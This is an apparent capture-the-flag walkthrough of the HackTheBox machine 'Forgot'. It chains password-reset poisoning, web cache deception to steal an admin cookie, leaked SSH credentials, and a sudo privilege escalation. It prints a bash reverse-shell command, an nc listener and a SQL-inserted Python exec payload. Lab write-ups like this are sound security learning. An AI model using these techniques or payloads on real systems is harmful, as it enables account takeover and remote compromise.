Forgot Hack The box Walkthrough — [HTB]

Forgot Htb Writeup

InfoSec Write-ups


Hey, Guys Welcome to My Blog So Today We are going to discuss about Forgot Hack the box machine

And Before going to the writeup if you like this please follow up my profile and give applause to this article because it literally motivate me post more writeup


This machine comes up with a host header injection in that we want to exploit the Password reset functionality to get access to the dashboard and using the Web cache deception you will get the Cookie of that admin and finally, you get the user shell of that machine


In this Root flag, we want to abuse the sudo binary to get the root shell of that machine

So Let's Get Started

Before Going to this machine Some people might get this Type of Error

If getting this Change your VPN or reset the machine in hack the box


So Now we get the machine first As usual we start with Our Nmap scan

STEP 1: nmap -sC -sV

Report 1
Report 2

By analyzing these two reports you get the usual ports like SSH,HTTP, etc. And the server is Werkzeug/2.1.2 Python/3.8.10, Cache server is varnish/6.2 interesting

Next, we look up that webpage

After that, I enumerate the directory using feroxbuster

STEP 2: feroxbuster -u -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt

Here you get something interesting…

Next, I found the username of that website in the source code

Note: I think it is random username please check source code by your own don’t copy and paste from my blog

Username: robert-dev-14522

Here we have the username but we don't the password so lets us click the forgot password because the machine makes sense here 😂😂

Password reset poisoning:

After further analyzing google I found an interesting article on poisoning the password reset functionality

Using the above article I poisoned the password reset functionality

First captured that request using Burp and next replace that IP with your local machine

Before that, start your listener on your local machine in port 80

Now send the request

And Wait a few minutes you get the reset link in your listener

Next copy that reset link and open it with your browser

Booooom!!! Now the password will be get reset and log in with that username and your new password

Now you get logged in as Robert

Further analyzing this I found some tickets in that portal

In that last ticket, you can able to notice that it SSH credentials and that is escalated which means resolved

So if we get the cookie of that admin you get the admin access and we can also get the SSH creds

Web Cache Deception:

Further analyzing this website I have found that It uses an old varnish cache server which is (Varnish/6.2) and I found something wired on the Age header it remains zero

I Capture that request using burp and you can able to see that the age header remains 0, next change that link to the extension .CSS then the age header shows the number 18 which means it caches the web page if we send that page to admin we can able to take over the session

( check out this below article )

It is amazing research presented by omergil in BlackHat if have any interest check out his presentation

First, go to escalate directory. Now you get some Escalation Form to report admin

Enter the malicious Link:

Send this request ( I was sent this via Burp )

Next, wait for a few minutes and curl that URL

STEP 3: curl -I

Now you will get the Cookie in Set-Cookie

Next, Replace the cookie in the storage tab

And open the boom!!! Now you will get the SSH Creds

Username:diego Password: dCb#1!x0%gjq

STEP 4: ssh diego@

Getting User shell:

Boommmm!!! Now you will get userflag of that machine

Privilege Escalation:

STEP 5: sudo -l


Further analyzing this I found that the script checks for reason from escalate table in the database XSS and there is MySQL Connector also

And the TensorFlow (2.6.3 )saved_model_cli which is vulnerable to code injection

So first create a reverse shell script on the tmp directory

STEP 6: bash -i >& /dev/tcp/ 0>&1

Next, give the executable permission and start your listener on your local machine

STEP 7: chmod 777

STEP 8: nc -lvp 5050

Next, open the MySQL database on that machine

And change the database to an app

Next enter the below payload on that database

insert into escalate values ("evil","evil","evil",'hello=exec("""\nimport os\nos.system("/tmp/")\nprint("&ErrMsg=%3Cimg%20src=%22")""")');

After that run that python script with sudo permission

Booommm!!!! Now go to the listener you will get the reverse shell

Now you can able to get the root flag of that machine

STEP 9: cat root.txt

I hope you will understand this article if you like this please donate to my OSCP Exam

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Hi, I'm Vignesh just call me Vicky. I'm a cybersecurity Researcher who was more interested in this cybersecurity field basically I'm a Offsec Student.